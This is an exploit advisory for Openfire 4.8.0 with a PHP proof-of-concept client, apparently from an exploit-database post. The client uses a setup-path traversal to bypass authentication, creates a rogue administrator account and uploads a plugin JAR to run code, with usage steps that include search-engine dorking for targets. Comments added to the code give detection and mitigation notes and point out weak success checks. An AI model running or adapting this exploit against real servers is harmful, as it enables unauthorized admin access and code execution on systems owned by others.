Headline
Openfire 4.8.0 Code Injection
Openfire version 4.8.0 suffers from authentication bypass and code injection vulnerabilities.
=============================================================================================================================================| # Title : Openfire release 4.8.0 Code Injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) || # Vendor : https://www.igniterealtime.org/projects/openfire/ |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 115 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :
<?php
/**
 * Proof-of-concept client as published. Every HTTP request goes through
 * sendRequest(); admin-console pages are reached through the
 * `setup/setup-s/../../../../` prefix (a path-traversal bypass of the
 * setup-wizard path filter — presumably what the vendor fix normalises), and
 * code execution comes from installing a plugin JAR through plugin-admin.jsp.
 *
 * Defender notes, derived only from the requests this class issues:
 *  - Detection: the literal `setup/setup-s/../` prefix in front of
 *    user-groups.jsp / user-create.jsp, a POST to user-create.jsp from an
 *    unauthenticated client, and a multipart POST to plugin-admin.jsp are all
 *    distinctive in admin-console or reverse-proxy access logs. Host-side
 *    artefacts would be an unexpected admin account and a newly installed plugin.
 *  - Mitigation: run a vendor release that rejects these traversal paths, keep
 *    the admin console off untrusted networks, and review admin accounts and
 *    installed plugins after any exposure window.
 */
class OpenfireExploit
{
    private $targetUrl;      // base URL, always normalised to end with '/'
    private $adminUsername;  // account created via user-create.jsp
    private $adminPassword;  // password for that account (hex string)
    private $pluginName;     // assigned in the constructor but never referenced by any method below
    private $csrfToken;      // last token scraped by getCsrfToken()

    /**
     * @param string      $targetUrl     base URL of the Openfire admin console
     * @param string|null $adminUsername defaults to a random letters-only name
     * @param string|null $adminPassword defaults to a random hex string
     * @param string|null $pluginName    defaults to a random name; unused elsewhere
     */
    public function __construct($targetUrl, $adminUsername = null, $adminPassword = null, $pluginName = null)
    {
        $this->targetUrl = rtrim($targetUrl, '/') . '/';
        $this->adminUsername = $adminUsername ?? $this->generateRandomString(8, 15);
        $this->adminPassword = $adminPassword ?? $this->generateRandomPassword(8, 10);
        $this->pluginName = $pluginName ?? $this->generateRandomString(8, 15);
    }

    /**
     * Random ASCII-letter string of length in [$minLength, $maxLength].
     * rand() and str_shuffle() are not cryptographic sources; here the value
     * is only a cosmetic account name, so that does not matter for behaviour.
     */
    private function generateRandomString($minLength, $maxLength)
    {
        $length = rand($minLength, $maxLength);
        return substr(str_shuffle("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"), 0, $length);
    }

    /**
     * Hex-encoded random bytes. `rand(...) / 2` is a float (9 / 2 = 4.5) while
     * random_bytes() takes an int, so this relies on implicit coercion; with
     * strict_types enabled it would raise a TypeError.
     */
    private function generateRandomPassword($minLength, $maxLength)
    {
        return bin2hex(random_bytes(rand($minLength, $maxLength) / 2));
    }

    /**
     * Thin curl wrapper. Returns the response body as a string, or false on a
     * transport failure (CURLOPT_RETURNTRANSFER). No HTTP status check and no
     * timeout are set, so any HTTP response — including a 403 — is returned as
     * a string and counts as "success" for the callers below. The curl handle
     * is never closed (curl_close() is not called).
     */
    private function sendRequest($method, $uri, $data = null, $headers = [])
    {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $this->targetUrl . $uri);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
        if ($data) {
            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        }
        return curl_exec($ch);
    }

    /**
     * Scrapes a `csrf=` value from the login.jsp response with a cookie-style
     * regex. Only the body is captured (CURLOPT_HEADER is not enabled), so this
     * depends on the token appearing in the page text — not verified here.
     * Returns null when nothing matches.
     */
    private function getCsrfToken()
    {
        $response = $this->sendRequest('GET', 'login.jsp');
        preg_match('/csrf=([^;]+)/', $response, $matches);
        return $matches[1] ?? null;
    }

    /**
     * Requests user-groups.jsp through the traversal prefix, twice. Because
     * sendRequest() returns a string for any HTTP status, the `!== false` test
     * only confirms that the request completed, not that the page was served
     * without authentication. For defenders, this request pair is the first
     * log artefact of the technique.
     */
    private function authBypass()
    {
        $this->sendRequest('GET', 'setup/setup-s/../../../../user-groups.jsp');
        // Check if we can access the user-groups.jsp page
        return $this->sendRequest('GET', 'setup/setup-s/../../../../user-groups.jsp') !== false;
    }

    /**
     * Form-POSTs the admin-user creation form (isadmin=on) to user-create.jsp
     * through the traversal prefix. An admin account created without a
     * preceding authenticated login is the audit-log signal to alert on.
     */
    private function addAdminUser()
    {
        $this->csrfToken = $this->getCsrfToken();
        $data = http_build_query([
            'csrf' => $this->csrfToken,
            'username' => $this->adminUsername,
            'password' => $this->adminPassword,
            'passwordConfirm' => $this->adminPassword,
            'isadmin' => 'on',
            'create' => 'Create User'
        ]);
        return $this->sendRequest('POST', 'setup/setup-s/../../../../user-create.jsp', $data);
    }

    /**
     * Multipart upload of a plugin JAR to plugin-admin.jsp. A plugin runs as
     * the server process, which is where "code injection" comes from; a new
     * JAR appearing in the plugin upload handler's destination is the
     * host-side indicator. Note that no session cookie is sent with this
     * request — whether the upload is accepted depends on server-side state
     * not visible in this file.
     */
    private function uploadPlugin($pluginFilePath)
    {
        $this->csrfToken = $this->getCsrfToken();
        $cfile = new CURLFile($pluginFilePath);
        $data = [
            'uploadfile' => $cfile,
            'csrf' => $this->csrfToken
        ];
        $headers = ['Content-Type: multipart/form-data'];
        return $this->sendRequest('POST', 'plugin-admin.jsp', $data, $headers);
    }

    /**
     * Runs the three steps in order and prints a line per step. Each "success"
     * branch is reached whenever the HTTP call returned a string (see
     * sendRequest()), so the printed messages reflect transport success only.
     */
    public function exploit()
    {
        if ($this->authBypass()) {
            echo "Authentication bypass successful.\n";
            if ($this->addAdminUser()) {
                echo "Admin user '{$this->adminUsername}' added successfully.\n";
                // Prepare plugin JAR file path
                $pluginJarPath = '/path/to/plugin.jar'; // Replace with actual path to the JAR file
                if ($this->uploadPlugin($pluginJarPath)) {
                    echo "Plugin uploaded successfully.\n";
                } else {
                    echo "Failed to upload plugin.\n";
                }
            } else {
                echo "Failed to add admin user.\n";
            }
        } else {
            echo "Authentication bypass failed.\n";
        }
    }
}
// Usage
$exploit = new OpenfireExploit('http://target-openfire-url.com');
$exploit->exploit();
Greetings to 
:=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================